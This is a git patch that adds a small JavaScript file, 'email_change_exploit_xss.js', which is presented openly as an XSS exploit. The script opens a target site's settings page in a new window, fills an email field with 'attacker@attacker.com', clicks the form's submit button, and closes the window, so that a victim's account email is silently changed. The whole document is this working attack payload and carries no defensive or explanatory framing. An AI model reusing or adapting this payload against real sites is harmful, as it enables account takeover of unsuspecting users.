From d301938480cd33a95e3a674c97b8ef8b5d27be33 Mon Sep 17 00:00:00 2001
From: A U L I A - R A K H E E N <31990509+aulliakenz@users.noreply.github.com>
Date: Fri, 30 Oct 2020 04:24:17 +0700
Subject: [PATCH] Create email_change_exploit_xss.js

---
 email_change_exploit_xss.js | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
 create mode 100644 email_change_exploit_xss.js

diff --git a/email_change_exploit_xss.js b/email_change_exploit_xss.js
new file mode 100644
index 0000000..3d5c7d3
--- /dev/null
+++ b/email_change_exploit_xss.js
@@ -0,0 +1,15 @@
+// a Simple XSS exploit for email change 
+// R0K
+
+var dark_window = window.open('https://www.target.com/settings');
+dark_window.addEventListener('load', 
+
+	function exploit_run(){
+		dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // changes email
+		dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission
+
+		setTimeout(function() { // just for delay and closing
+			dark_window.close();
+		}, 10000);
+
+	}, true);